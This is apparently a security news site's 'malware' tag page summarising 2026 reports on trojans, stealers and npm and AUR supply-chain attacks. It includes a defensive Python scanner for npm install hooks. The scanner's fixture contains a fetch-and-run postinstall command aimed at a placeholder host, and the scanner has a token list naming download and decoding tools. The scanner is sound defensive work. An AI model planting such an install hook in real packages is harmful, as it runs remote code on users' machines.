Tag: malware
-
GhostTree Attack Abused Recursive Windows Junctions to Hide Malware
GhostTree uses recursive NTFS junctions to generate vast numbers of valid Windows file paths. Varonis explains how the technique could cause Microsoft Defender folder scans to never complete, leaving malware undetected. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ghosttree-attack-abused-recursive-windows-junctions-to-hide-malware/
-
‘Lorem Ipsum’ Malware Pivots to ClickFix Delivery
New analysis shows the campaign, which uses compromised WordPress sites, may be linked to the ransomware and data extortion group Vice Society. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/lorem-ipsum-malware-clickfix-delivery
-
New Rokarolla Android Malware Steals PINs, SMS Codes, and Crypto Wallet Funds
Security researchers at Zimperium’s zLabs have documented a new Android banking trojan, Rokarolla, that targets 217 banking and cryptocurrency apps and packs 137 remote commands. Together, they give an operator near-total control of an infected phone: it lifts lock-screen PINs, reads and sends SMS, rewrites the clipboard to redirect crypto payments, and switches off Google Play…
-
Captured by Malware: 124 Million New Passwords at HaveIBeenPwned
Cybercriminals frequently harvest credentials with infostealer malware. HaveIBeenPwned has added a large collection of them to its database. First seen on golem.de Jump to article: www.golem.de/news/mit-malware-erbeutet-124-millionen-neue-passwoerter-bei-haveibeenpwned-2606-209825.html
-
Ransomware gang abuses Microsoft Teams relays to hide malicious traffic
DragonForce ransomware used a custom malware named ‘Backdoor.Turn’ to hide command-and-control traffic inside Microsoft Teams relay infrastructure. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ransomware-gang-abuses-microsoft-teams-relays-to-hide-malicious-traffic/
-
Windows version of SprySOCKS Linux malware used to attack govt orgs
Windows variants for the SprySOCKS Linux malware have been used in attacks targeting government organizations in at least four countries. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/windows-version-of-sprysocks-linux-malware-used-to-attack-govt-orgs/
-
Fake Microsoft Alerts Used to Deploy North Korean NarwhalRAT Malware
The North Korean state-sponsored hacking group known as ScarCruft (aka APT37) has been observed using spear-phishing messages impersonating Microsoft Account security notifications to deliver malware called NarwhalRAT. ”The attack email contained a message impersonating an MS account security alert,” the Genians Security Center (GSC) said. “It was designed to create concern over possible First seen on…
-
China-linked group uses InfiniteRed malware to target medical research institutions
First seen on scworld.com Jump to article: www.scworld.com/brief/china-linked-group-uses-infinitered-malware-to-target-medical-research-institutions
-
New Argamal malware disguised as adult games targets users
First seen on scworld.com Jump to article: www.scworld.com/brief/new-argamal-malware-disguised-as-adult-games-targets-users
-
Chinese hackers breached North American research institutions via REDCap servers
A China-linked cyber espionage operation targeted North American medical research institutions through compromised REDCap servers, using custom malware to gain persistent … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2026/06/15/chinese-hackers-redcap-medical-research-institutions-breach/
-
North Korean Hackers Are Turning Developer Tools Into Malware Delivery Channels
Cybersecurity researchers have flagged two malicious cyber campaigns that exhibit similarities with a persistent North Korean threat cluster known as Contagious Interview (aka Famous Chollima, HexagonalRodent, and Void Dokkaebi). According to a report published by Proofpoint, the threat actor has been found orchestrating phishing campaigns using developer role recruitment or code review themes First seen on…
-
Chinese hackers breach REDCap servers, steal medical research
A China-linked espionage campaign targeted exposed REDCap servers to deploy the InfiniteRed malware and steal sensitive data from a medical institution in North America. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/chinese-hackers-breach-redcap-servers-steal-medical-research/
-
Threat Actor Malware Platform Exposed Through Unlocked PHP Installer Page
A misconfigured PHP-based malware distribution platform has been exposed after a security researcher inadvertently gained administrative access via an unlocked installation page, highlighting critical operational security failures in the active threat actor’s infrastructure. The incident, documented on June 11, 2026, began with routine threat intelligence monitoring on X (formerly Twitter), where a suspicious software download…
-
Hackers Hide New Argamal Malware Inside Working Hentai Games
Kaspersky found Argamal malware hidden in hentai game installers, giving hackers remote access through working games shared on adult sites and torrents. First seen on hackread.com Jump to article: hackread.com/hackers-hide-argamal-malware-hentai-games/
-
Manipulated Red Hat npm packages spread new malware
The JFrog Security Research team has analyzed a new wave of the Shai-Hulud supply-chain malware. Affected are 96 tampered package versions in the npm namespace @redhat-cloud-services, a namespace used by Red Hat itself and therefore trusted. The attackers did not plant typosquatting packages; they abused legitimate, widely used components as carriers. In the malicious code itself the campaign is named ‘Miasma: The Spreading…
-
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 101
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Malware Newsletter: IronWorm: Shai-Hulud’s rustier cousin; Trojanized ai-sdk-ollama Delivers Miasma, a Self-Replicating npm Worm via binding.gyp; Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO; Using AI Agents to Analyze Malware on REMnux; The Miasma…
-
Siemens Desigo CC patch files falsely flagged as malware
First seen on scworld.com Jump to article: www.scworld.com/brief/siemens-desigo-cc-patch-files-falsely-flagged-as-malware
-
Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit
Attackers took over more than 400 packages in the Arch User Repository (AUR) this week and rewrote their build scripts to install a credential stealer on any machine that built them. The malware is a Rust binary built to harvest developer secrets. When it lands with root, it can also load an eBPF rootkit to hide…
-
400+ Arch Linux AUR Packages Hijacked to Install Rust Credential Stealer
Attackers took over more than 400 packages in the Arch User Repository (AUR) this week and rewrote their build scripts to install a credential stealer on any machine that built them. The malware is a Rust binary built to harvest developer secrets. When it lands with root, it can also load an eBPF rootkit to hide…
-
Atomic Arch Campaign Hijacks 20+ Linux AUR Packages to Deliver Malware
Over 20 Linux packages were compromised in the Atomic Arch campaign, which abuses AUR ownership transfers to drop rootkit-like malware. First seen on hackread.com Jump to article: hackread.com/atomic-arch-hijacks-linux-aur-packages-malware/
-
Over 400 Arch Linux packages compromised to push rootkit, infostealer
More than 400 packages in the Arch User Repository (AUR) are distributing a Linux rootkit and infostealer malware targeting credentials and access tokens. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/over-400-arch-linux-packages-compromised-to-push-rootkit-infostealer/
-
Hackers Use Typosquatted npm Packages to Target Web3 Projects and Crypto Wallet Operators
Hackers have been using typosquatting npm packages to weaponize the trust Web3 teams place in open-source dependencies, turning routine installs into a path for wallet theft, secret harvesting, and staged malware delivery. The campaign is especially dangerous because it blends familiar Ethereum and blockchain branding with postinstall and preinstall abuse, allowing malicious code to execute…
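The postinstall and preinstall abuse described above (and the binding.gyp route in the Miasma item earlier on this page) works because npm runs a package's install-time lifecycle scripts before the project has imported a single line of it. A practical first check is to inventory every installed package that declares such a script and review the commands. The following scanner is an added example, not the campaign's code nor any project's tool; it walks an installed tree, collects install-time hooks, and applies a small constructed heuristic for commands that fetch or decode code at install time. The package names and commands in the fixture are constructed placeholders.

```python
import json
import os
import tempfile

# Lifecycle scripts npm runs during installation, before the project has
# imported anything from the package.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics for commands that fetch or decode code at install
# time; illustrative, not an authoritative list.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "powershell", "base64", "node -e", "eval(")


def find_install_hooks(node_modules):
    """Walk an installed tree and return, per package with install-time
    scripts: {"hooks": {hook: command}, "suspicious": bool}."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(node_modules):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as f:
                meta = json.load(f)
        except (OSError, json.JSONDecodeError):
            continue
        scripts = meta.get("scripts") or {}
        hooks = {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}
        if not hooks:
            continue
        joined = " ".join(hooks.values())
        findings[meta.get("name", dirpath)] = {
            "hooks": hooks,
            "suspicious": any(tok in joined for tok in SUSPICIOUS_TOKENS),
        }
    return findings


def build_fixture():
    """Constructed node_modules (not a real package set): one native addon
    whose prepare step is an ordinary node-gyp build, one package whose
    postinstall pulls and runs a remote script, one with no install hooks."""
    root = tempfile.mkdtemp(prefix="node_modules_")
    packages = {
        "example-native-addon": {"prepare": "node-gyp rebuild"},
        "example-suspect": {"postinstall": "curl -fsSL http://example.invalid/setup.sh | sh"},
        "example-plain": {"test": "jest"},
    }
    for name, scripts in packages.items():
        pkg_dir = os.path.join(root, name)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as f:
            json.dump({"name": name, "version": "1.0.0", "scripts": scripts}, f)
    return root


if __name__ == "__main__":
    for name, info in find_install_hooks(build_fixture()).items():
        flag = "REVIEW" if info["suspicious"] else "ok    "
        print(flag, name, info["hooks"])
```

A native addon legitimately needs an install hook to compile, so the output is a review list, not a block list. In CI the cheaper control is to not run hooks at all: `npm ci --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) and then build the handful of packages that genuinely need it explicitly.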
-
OnyxC2 Stealer Uses Cloudflare-Fronted C2 to Exfiltrate Browser Data and Credentials
A new commercial-grade information stealer, marketed as OnyxC2, surfaced on cybercrime forums in early 2026 and demonstrates how commodity malware is increasingly packaged as a full-service product. For $250 a month buyers receive a web-based control panel, a payload builder, tiered licensing, and even refund guarantees if a build is detected, lowering the barrier for…
-
ThreatsDay Bulletin: Worm Code Leaked, AI Agent Phished, Claude Code Patch + 28 New Stories
It’s been one of those weeks. You expect the usual noise: recycled malware, sloppy attacks, another easy target getting hit. Instead, there’s a supply chain attack kit in a public repo, a $5,000-a-month RAT that clones browsers, and research showing AI agents can be tricked into leaking real credentials.The bigger problem is how polished this…
-
OnyxC2 Malware-as-a-Service Offers Enterprise-Grade Data Theft
OnyxC2 is a MaaS stealer targeting 210+ apps, using DLL sideloading, encrypted payloads, and remote access features to evade detection. OnyxC2 appeared on a cybercrime forum earlier this year and is sold as a subscription service: $250 per month for the standard build, $500 for the premium tier that includes HVNC, and $6,000 for an…
-
Fake Spotify Premium tutorials on TikTok and Instagram Reels spread malware
Cybercriminals are using TikTok and Instagram Reels videos to spread Vidar, an infostealer malware, through fake downloads for popular paid software, according to … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2026/06/11/vidar-infostealer-tiktok-instagram-reels-malware-campaigns/